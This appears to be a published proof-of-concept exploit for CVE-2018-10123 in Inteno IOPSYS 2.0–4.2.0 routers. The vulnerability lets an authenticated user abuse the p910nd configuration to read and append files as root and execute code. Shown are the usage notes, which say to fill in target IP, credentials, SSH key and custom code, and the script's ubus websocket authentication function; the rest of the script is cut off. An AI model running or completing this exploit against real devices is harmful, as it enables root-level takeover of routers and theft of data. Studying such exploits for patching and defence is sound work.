Inteno IOPSYS 2.0 - 4.2.0 p910nd Remote Command Execution

`'''  
Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123.  
  
This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.  
'''  
  
#!/usr/bin/python3  
  
import json  
import sys  
import socket  
import os  
import time  
from websocket import create_connection  
  
def ubusAuth(host, username, password):  
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])  
req = json.dumps({"jsonrpc":"2.0","method":"call",  
"params":["00000000000000000000000000000000","session","login",  
{"username": username,"password":password}],  
"id":666})  
ws.send(req)  
response = json.loads(ws.recv())  
ws.close()  
try:  
key = response.get('result')[1].get('ubus_rpc_session')  
except IndexError:  
return(None)  
return(key)  
  
`